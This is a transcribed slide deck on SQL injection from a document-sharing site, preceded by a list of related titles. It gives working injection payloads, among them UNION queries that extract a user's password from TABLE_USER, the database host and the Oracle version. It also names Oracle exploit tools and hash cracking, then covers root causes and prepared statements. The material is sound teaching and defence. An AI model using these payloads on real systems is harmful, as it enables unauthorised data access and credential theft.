Who s Afraid of SQL Injection?! Mike Kölbl Sonja Klausburg Siegfried Goeschl

Similar documents
SQL Injection Attacks and Defense

Advanced SQL Injection Techniques. Roy Fox Red Team Manager, Sentrigo

Holistic Database Security

Database Attacks, How to protect the corporate assets. Presented by: James Bleecker

Automated SQL Ownage Techniques. OWASP October 30 th, The OWASP Foundation

Lecture 7: Web hacking 3, SQL injection, Xpath injection, Server side template injection, File inclusion

IT Service Delivery and Support Week Three. IT Auditing and Cyber Security Fall 2016 Instructor: Liang Yao

Web Application & Web Server Vulnerabilities Assessment Pankaj Sharma

CSE 127 Computer Security

Secure Programming and! Common Errors! PART II"

MWR InfoSecurity Security Advisory. Oracle Enterprise Manager SQL Injection Advisory. 1 st February 2010

ATTACKING SYSTEM & WEB Desmond Alexander CISSP / GIAC/ GPEN CEO FORESEC

I n p u t. This time. Security. Software. sanitization ); drop table slides. Continuing with. Getting insane with. New attacks and countermeasures:

Application vulnerabilities and defences

CIS 700/002 : Special Topics : OWASP ZED (ZAP)

Web Security. Attacks on Servers 11/6/2017 1

Secure Web App. 제목 : Secure Web Application v1.0 ( 채수민책임 ) Copyright 2008 Samsung SDS Co., Ltd. All rights reserved - 1 -

SQL Injection. EECS Introduction to Database Management Systems

Your Turn to Hack the OWASP Top 10!

Oracle Database 10g: Introduction to SQL

Tutorial on SQL Injection

DEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology

Get Oracle Schema Ddl Syntax With Dbms_metadata

(System) Integrity attacks System Abuse, Malicious File upload, SQL Injection

The Ultimate Windows 10 Hardening Guide: What to Do to Make Hackers Pick Someone Else

Web Penetration Testing

Attacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14

Simon Pane First4 Database Partners March 15, 2012

Web Security: Vulnerabilities & Attacks

Injection. CSC 482/582: Computer Security Slide #1

SBCC Web File System - Xythos

Integrity attacks (from data to code): Malicious File upload, code execution, SQL Injection

Secure Programming Techniques

CS 377 Database Systems. Li Xiong Department of Mathematics and Computer Science Emory University

Penetration from application down to OS

Karthik Bharathy Program Manager, SQL Server Microsoft

CSE 565 Computer Security Fall 2018

Uniform Resource Locators (URL)

Interpreting Explain Plan Output. John Mullins

WEB SECURITY: SQL INJECTION

Database Rootkits. Alexander Kornbrust 01-April Red-Database-Security GmbH. Alexander Kornbrust, 01-Apr-2005 V1.05 1

Web Security. Outline

Featuring. and. Göteborg. Ulf Larson Thursday, October 24, 13

A1 (Part 2): Injection SQL Injection

PASSWORDS TREES AND HIERARCHIES. CS121: Relational Databases Fall 2017 Lecture 24

SQL (Structured Query Language)

EDUVITZ TECHNOLOGIES

Oracle post exploitation techniques. László Tóth

Server-side web security (part 2 - attacks and defences)

Running SQL in Java and PHP

Blind Sql Injection with Regular Expressions Attack

Announcements. PS 3 is out (see the usual place on the course web) Be sure to read my notes carefully Also read. Take a break around 10:15am

Web Application Security. Philippe Bogaerts

Welcome to the OWASP TOP 10

web.py Tutorial Tom Kelliher, CS 317 This tutorial is the tutorial from the web.py web site, with a few revisions for our local environment.

Assignment 6. This lab should be performed under the Oracle Linux VM provided in the course.

Sichere Software vom Java-Entwickler

1. Oracle mod_plsql v in Oracle9i Application Server v1.0.2.x (Oracle9iAS v1.0.2.x)

CSE 127: Computer Security SQL Injection. Vector Li

Daniel Pittman October 17, 2011

Ofer MAOR CTO Quotium

eb Security Software Studio

Mobile Trends And The New Threats Is Your SAP System Vulnerable to Cyber Attacks? Stephen Lamy, Virtual Forge

Top 10 Database Security Threats and How to Stop Them. Rob Rachwald Director of Security Strategy

Running SQL in Java and PHP

Hack-Proofing Your ASP.NET Applications

Penetration Testing with Kali Linux

Exam4Free. Free valid exam questions and answers for certification exam prep

SQL Injec*on. By Robin Gonzalez

Oracle Database 11g: SQL Tuning Workshop

Computer Security. 04r. Pre-exam 1 Concept Review. Paul Krzyzanowski. Rutgers University. Spring 2018

CSE361 Web Security. Attacks against the server-side of web applications. Nick Nikiforakis

Secure Programming. Input Validation. Learning objectives Code Injection: Outline. 4 Code Injection

Module 9: Managing Schema Objects

MASSACHUSETTS INSTITUTE OF TECHNOLOGY Fall Quiz II

WEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang

Load data into Table from external files, using two methods:

Oracle Security Masterclass

Sql Server Syllabus. Overview

Excerpts of Web Application Security focusing on Data Validation. adapted for F.I.S.T. 2004, Frankfurt

This slide shows the OWASP Top 10 Web Application Security Risks of 2017, which is a list of the currently most dangerous web vulnerabilities in

Program Security and Vulnerabilities Class 2

Configuring the Oracle Network Environment. Copyright 2009, Oracle. All rights reserved.

Application Security Introduction. Tara Gu IBM Product Security Incident Response Team

Oracle Security Masterclass

Lecture 13: MySQL and PHP. Monday, March 26, 2018

Understanding Advanced Blind SQLI attack

Persistent key, value storage

Web Security. Web Programming.

INF 102 CONCEPTS OF PROG. LANGS ADVERSITY. Instructors: James Jones Copyright Instructors.

Oracle PL/SQL Gateway 0-Day

Lecture 4 September Required reading materials for this class

CSCE 548 Building Secure Software SQL Injection Attack

Exam Questions MA0-150

Security context. Technology. Solution highlights

CS 161 Computer Security

WordPress Security Plugins vs. WAF Services. A Comparative Test of WAF Accuracy in Security Solutions

Application Layer Security

Table of Contents. PDF created with FinePrint pdffactory Pro trial version

Securing Internet Communication: TLS

Transcription:

Who s Afraid of SQL Injection?! Mike Kölbl Sonja Klausburg Siegfried Goeschl 1

http://xkcd.com/327/ 2

What Is SQL Injection? Incorrectly validated or nonvalidated string literals are concatenated into a dynamic SQL statement, and interpreted as code by the SQL engine. 3

Why SQL Injection? Get access to a different user account Find data you are not allowed to see Become a DBA without job promotion Infiltrate other backend servers assuming you are a really bad guy 4

Categories of Attacks SQL Manipulation Code Injection Function Call Injection Buffer Overflows 5

SQL Manipulation SELECT * FROM users WHERE username = 'bob' and PASSWORD = 'mypassword' SELECT * FROM users WHERE username = 'bob' and PASSWORD = 'mypassword' or 'a' = 'a' The WHERE clause is true for every row 6

SQL Manipulation SELECT product_name FROM all_products WHERE product_name like '%Chairs%' SELECT product_name FROM all_products WHERE product_name like '%Chairs' UNION SELECT username FROM dba_users WHERE username like '%' SQL statement is returning rows from another table 7

Code Injection SELECT * FROM users WHERE username = 'bob' and PASSWORD = 'mypassword'; SELECT * FROM users WHERE username = 'bob' and PASSWORD = 'mypassword'; DELETE FROM users WHERE username = 'admin'; Does not work with Oracle (easily)... 8

Function Call Injection SELECT TRANSLATE('user input', '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ', '0123456789') FROM dual; SELECT TRANSLATE('' UTL_HTTP.REQUEST('http:// 192.168.1.1/') '', '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ', '0123456789') FROM dual; UTL_HTTP.REQUEST uses a URL as its argument and returns up to the first 2000 bytes of data retrieved from that URL 9

Are You Afraid of SQL Injection?! 10

You Better Should 11

First Contact 12

First Contact '; -- 13

14

Hello World ' UNION SELECT 1,0,'','','','Hello World','','','','','','','','','','','' FROM DUAL WHERE 1=1 OR 1=' ' UNION SELECT 1,0,'','','','Hello World','','','','','','','','','','','' FROM DUAL WHERE 1=1 OR 1=' 15

Hello World ' UNION SELECT 1,0,'','','','Hello World','','','','','','','','','','','' FROM DUAL WHERE 1=1 OR 1=' 16

Password Helper ' UNION SELECT 1,0,'','','',PASSWORD, '','','','','','','','','','','' FROM TABLE_USER WHERE LOGIN_NAME=LOWER('mkpe9r') OR 1=' ' UNION SELECT 1,0,'','','',PASSWORD, '','','','','','','','','','','' FROM TABLE_USER WHERE LOGIN_NAME=LOWER('mkpe9r') OR 1=' 17

Password Helper ' UNION SELECT 1,0,'','','',PASSWORD, '','','','','','','','','','','' FROM TABLE_USER WHERE LOGIN_NAME=LOWER('mkpe9r') OR 1=' 18

Password Helper select table_x_site_search.x_site_objid, x_bo_status,x_bo_x_sales_segment, x_bo_org_id,x_b_x_ban_id, x_company_name,x_a_address,x_a_zipcode,x_a_city, x_ctry_name,x_ctry_x_iso_code_2l, x_b_x_firmenbuchnummer,x_b_x_uid_number, x_e_first_name,x_e_last_name, x_e_e_mail,x_user_login_name from table_x_site_search, table_bus_org where table_x_site_search.x_bo_org_id = table_bus_org.org_id and x_s_company_name like 'MO%' and x_ctry_x_iso_code_2l = 'AT' and upper(x_a_s_address) like 'ER%' and x_a_zipcode = '' UNION SELECT 1,0,'','','',PASSWORD, '','','','','','','','','','','' FROM TABLE_USER WHERE LOGIN_NAME=LOWER('MKPE9R') OR 1='' and rownum <= 200 19

DB Host Lookup ' UNION SELECT 1,0,'','','',S.MACHINE,'','','','','','','','','','','' FROM V$SESSION S, V$PROCESS P WHERE P.SPID = S.PROCESS AND MACHINE IS NOT NULL OR 1=' 20

Get Oracle Version ' UNION SELECT 1,0,'','','',VERSION,'','','','','','','','','','','' FROM DBA_REGISTRY WHERE COMP_ID = 'CATALOG' OR 1=' 21

Oracle Cheat Sheet List users and password hashes checkpwd will crack the DES-based hashes from Oracle 8, 9 and 10. List all databases, tables and columns Local file access using UTL_FILE Make DNS requests 22

Cool Oracle Exploits raptor_oraextproc.sql raptor_oraexec.sql raptor_orafile.sql Directory traversal vulnerability in extproc Exploitation suite for Oracle written in Java, to read/write files and execute OS commands File system access suite for Oracle based on the utl_file package, to read/ write files 23

Root Cause Analysis Affects CUSI I29 and I30-dev RegExp validation for PLZ is broken Input field is not truncated No SQL escaping of query parameter Literal SQL Statement is used Passwords are not always encrypted 24

How To Avoid Prepared Statements Test for SQL Vulnerability Code Reviews Think about security Before someone else is doing it for you 25

Why this would not happen to you?! 26

Question And Answers 27

Resources http://www.net-security.org/dl/articles/integrigyintrotosqlinjectionattacks.pdf http://pentestmonkey.net/blog/oracle-sql-injection-cheat-sheet/ http://www.0xdeadbeef.info/ http://www.red-database-security.com/exploits/oracle_10g_exploits.html 28

2024 © technodocbox.com Privacy Policy | Terms of Service | Feedback